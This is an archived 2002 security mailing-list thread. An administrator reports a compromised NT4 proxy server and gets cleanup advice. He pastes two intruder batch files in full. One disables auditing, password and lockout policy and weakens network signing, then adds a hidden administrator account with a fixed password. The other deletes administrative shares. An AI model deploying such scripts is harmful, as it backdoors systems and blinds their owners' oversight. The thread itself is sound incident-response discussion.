I have seen a lot of this. A bunch of script kiddie's scanning for the most obvious holes. From some of the one's I've seen, it looked like some of them were using an automated script to do pretty much all of the work, other's did it manually. Most of servers were running serv-u ftp, an irc bot, and were pretty much being zombies. Obviously I would consider reinstalling and patching the system. It doesn't take long at all to reinstall NT and setup proxy. But if this is something you can't take down for a day or so, then I wouldn't consider it that big of a deal. Delete the stuff they installed and patch the system so they can't do it again. It wasn't solely an attack on your network, so you have a better chance of them not pilfering through all your data. More so just using it as another server to add to their list. Just look at what irc server & channel the bot connected too, you'll see all the others :). Have fun. -- ZeroBreak -----Original Message----- From: Mike Cain [mailto:mikecat_private] Sent: Monday, November 18, 2002 9:01 AM To: incidentsat_private Subject: Proxy server hit... Any ideas? Well, I have had my first run-in with a hacker, or was it a virus? I'm not 100% sure.. Guess I should start from the beginning... A days ago, I began to get user complaints on the slowness of the internet. I figured it was mostly them just wanting something to complain about, so I did what all crappy admins do, I ignored it. Well, last night the box was rebooted after some software was updated. Today people were complaining about how PAINFULLY slow the internet was, so I looked at the proxy server. NT4 running proxy3. I know, there is newer better stuff, but its what I have to work with. :) SO... I looked at the processes and noticed the CPU hovering at 35-50%.. Way too high. So a quick look at the process list showed two things that I didn't remember needing to be there, win.exe and start.exe. Next move was to find them, and they were in the winnt\system\ folder. What I also found odd was that there were three new folders in that directory all created on the 8th, NT, tools, and win. Here are the contents, respectively. 1. 1fg.dll, 1gno32.dll, 1s.dll, 1t.exe(antivirus sees this one as a backdoor Trojan), 132.dll, 1gn32.dll, 1idv32.dll, 1sf32.dll, 1ygwin1.dll (says it's a Cygwin POSIX Emulation DLL), 132.dll.bkup 2. temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in, srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer Utility Routine), and _zoLibr.dll 3. (folder) FL, cygwin.dll, MS.dll, secure.bat (see below), temp, x32.dll, cfg.dll, IGNo32.dll, secure1.bat (see below) pidv32.dll, win.exe, x32.dll.bkup SO, anyone know what I have or what hit me? From looking at the sercure and secure1 batch files, it looks like a root kit... But I'mm new at this side of security I'mm aCiscoo guy...) Last thing, the logs show that the attacker was hitting the \scripts\sample\ folder... Meaning I think he was trying to use the old IIS Sample Scripts to execute local code... Not sure if he was successful... Thanks in advance!! Mike Cain CCNP/MCSE Secure.bat = @echo off del temp echo Compiling New Security Policy ... echo [Version] >> temp echo signature="$CHICAGO$" >> temp echo Revision=1 >> temp echo [Profile Description] >> temp echo Description=Default Security Settings. (Windows 2000 Professional) >> temp echo [System Access] >> temp echo MinimumPasswordAge = 0 >> temp echo MaximumPasswordAge = 42 >> temp echo MinimumPasswordLength = 0 >> temp echo PasswordComplexity = 0 >> temp echo PasswordHistorySize = 0 >> temp echo LockoutBadCount = 0 >> temp echo RequireLogonToChangePassword = 0 >> temp echo ClearTextPassword = 0 >> temp echo [Event Audit] >> temp echo AuditSystemEvents = 0 >> temp echo AuditLogonEvents = 0 >> temp echo AuditObjectAccess = 0 >> temp echo AuditPrivilegeUse = 0 >> temp echo AuditPolicyChange = 0 >> temp echo AuditAccountManage = 0 >> temp echo AuditProcessTracking = 0 >> temp echo AuditDSAccess = 0 >> temp echo AuditAccountLogon = 0 >> temp echo [Registry Values] >> temp echo machine\system\currentcontrolset\services\netlogon\parameters\signsecure channel=4,1 >> temp echo machine\system\currentcontrolset\services\netlogon\parameters\sealsecure channel=4,1 >> temp echo machine\system\currentcontrolset\services\netlogon\parameters\requirestr ongkey=4,0 >> temp echo machine\system\currentcontrolset\services\netlogon\parameters\requiresig norseal=4,0 >> temp echo machine\system\currentcontrolset\services\netlogon\parameters\disablepas swordchange=4,0 >> temp echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\r equiresecuritysignature=4,0 >> temp echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\e nablesecuritysignature=4,1 >> temp echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\e nableplaintextpassword=4,0 >> temp echo machine\system\currentcontrolset\services\lanmanserver\parameters\requir esecuritysignature=4,0 >> temp echo machine\system\currentcontrolset\services\lanmanserver\parameters\enable securitysignature=4,0 >> temp echo machine\system\currentcontrolset\services\lanmanserver\parameters\enable forcedlogoff=4,1 >> temp echo machine\system\currentcontrolset\services\lanmanserver\parameters\autodi sconnect=4,15 >> temp echo machine\system\currentcontrolset\control\session manager\protectionmode=4,1 >> temp echo machine\system\currentcontrolset\control\session manager\memory management\clearpagefileatshutdown=4,0 >> temp echo machine\system\currentcontrolset\control\print\providers\lanman print services\servers\addprinterdrivers=4,0 >> temp echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0 >> temp echo machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >> temp echo machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0 >> temp echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0 >> temp echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0 >> temp echo machine\software\microsoft\windows\currentversion\policies\system\shutdo wnwithoutlogon=4,1 >> temp echo machine\software\microsoft\windows\currentversion\policies\system\legaln oticetext=1, >> temp echo machine\software\microsoft\windows\currentversion\policies\system\legaln oticecaption=1, >> temp echo machine\software\microsoft\windows\currentversion\policies\system\dontdi splaylastusername=4,0 >> temp echo machine\software\microsoft\windows nt\currentversion\winlogon\scremoveoption=1,0 >> temp echo machine\software\microsoft\windows nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp echo machine\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatefloppies=1,0 >> temp echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatedasd=1,0 >> temp echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatecdroms=1,0 >> temp echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp echo [Privilege Rights] >> temp echo seassignprimarytokenprivilege = >> temp echo seauditprivilege = >> temp echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp echo sebatchlogonright = >> temp echo sechangenotifyprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >> temp echo secreatepagefileprivilege = *S-1-5-32-544 >> temp echo secreatepermanentprivilege = >> temp echo secreatetokenprivilege = >> temp echo sedebugprivilege = *S-1-5-32-544 >> temp echo sedenybatchlogonright = >> temp echo sedenyinteractivelogonright = >> temp echo sedenynetworklogonright = >> temp echo sedenyservicelogonright = >> temp echo seenabledelegationprivilege = >> temp echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp echo seincreasequotaprivilege = *S-1-5-32-544 >> temp echo seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-196040 8961-1637723038-1801674531-501 >> temp echo seloaddriverprivilege = *S-1-5-32-544 >> temp echo selockmemoryprivilege = >> temp echo semachineaccountprivilege = >> temp echo senetworklogonright = %1 >> temp echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp echo sesecurityprivilege = *S-1-5-32-544 >> temp echo seservicelogonright = >> temp echo seshutdownprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp echo sesyncagentprivilege = >> temp echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp echo sesystemprofileprivilege = *S-1-5-32-544 >> temp echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp echo setakeownershipprivilege = *S-1-5-32-544 >> temp echo setcbprivilege = >> temp echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >> temp echo Adding User %1 with the Password %2 ... net user /add slash 971985 echo Adding slash to the Local Administrator Group ... net localgroup administrators slash /add echo Loading New Security Policy ... secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp echo System is now secure. Secure1.bat net share /delete C$ /y > net.deld net share /delete D$ /y >> net.deld net share /delete E$ /y >> net.deld net share /delete F$ /y >> net.deld net share /delete G$ /y >> net.deld net share /delete H$ /y >> net.deld net share /delete I$ /y >> net.deld net share /delete J$ /y >> net.deld net share /delete K$ /y >> net.deld net share /delete L$ /y >> net.deld net share /delete M$ /y >> net.deld net share /delete N$ /y >> net.deld net share /delete O$ /y >> net.deld net share /delete P$ /y >> net.deld net share /delete Q$ /y >> net.deld net share /delete R$ /y >> net.deld net share /delete S$ /y >> net.deld net share /delete T$ /y >> net.deld net share /delete U$ /y >> net.deld net share /delete V$ /y >> net.deld net share /delete W$ /y >> net.deld net share /delete X$ /y >> net.deld net share /delete Y$ /y >> net.deld net share /delete Z$ /y >> net.deld net share /delete ADMIN$ /y >> net.deld #net share /delete IPC$ /y >> net.deld del net.deld ------------------------------------------------------------------------ ---- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Fri Nov 22 2002 - 05:06:33 PST